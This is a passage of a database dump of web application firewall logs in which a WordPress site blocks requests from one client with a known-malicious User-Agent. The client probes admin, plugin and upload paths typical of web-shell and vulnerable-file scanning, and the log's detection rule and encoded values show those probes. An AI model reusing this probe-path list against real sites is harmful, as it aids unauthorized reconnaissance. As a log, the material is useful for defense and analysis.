Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134168,1699994766.209546,1699994766.200900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134169,1699994764.483760,1699994764.475100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wpdb.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwZGIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134170,1699994762.890705,1699994762.880800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134171,1699994760.903369,1699994760.887900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-styles.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXN0eWxlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134172,1699994759.282083,1699994759.272600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-scripts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXNjcmlwdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134173,1699994757.315462,1699994757.306200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-http.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWh0dHAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134174,1699994755.612283,1699994755.602900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134175,1699994753.516148,1699994753.507000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-template.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXRlbXBsYXRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134176,1699994751.559897,1699994751.537200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-editor.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLWVkaXRvci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134177,1699995214.761753,1699995214.752900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134178,1699995211.239345,1699995211.230600,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134179,1699995209.821029,1699995209.800700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134180,1699995208.242920,1699995208.227700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134181,1699995206.726350,1699995206.716800,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/user/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3VzZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134182,1699995205.206080,1699995205.197100,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(134183,1699995203.463011,1699995203.440700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(134184,1699995190.188992,1699995190.180300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/uploads/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZHMvaW1hZ2VzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134185,1699995188.457644,1699995188.449000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/components/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134186,1699995186.617801,1699995186.608300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/modules/mod_simplefileuploadv1.3/elements/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(134187,1699995184.896364,1699995184.880300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/controller/extension/extension/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134188,1699995183.146828,1699995183.133300,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/sites/default/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(134189,1699995180.604381,1699995180.589900,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/fckeditor/editor/filemanager/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134190,1699995178.494536,1699995178.472500,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/admin/images/slider/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2ltYWdlcy9zbGlkZXIv\",\"category\":\"brute-force\",\"ssl\":1}'),(134191,1699995165.934719,1699995165.926000,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload-php7.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQtcGhwNy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134192,1699995156.333116,1699995156.323700,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/random_compat/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JhbmRvbV9jb21wYXQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134193,1699995151.000870,1699995150.989400,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/php-compat/readonly.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3BocC1jb21wYXQvcmVhZG9ubHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134194,1699995141.918539,1699995141.909200,0x00000000000000000000FFFFC2A9AF25,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/html-api/class-wp-html-token.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 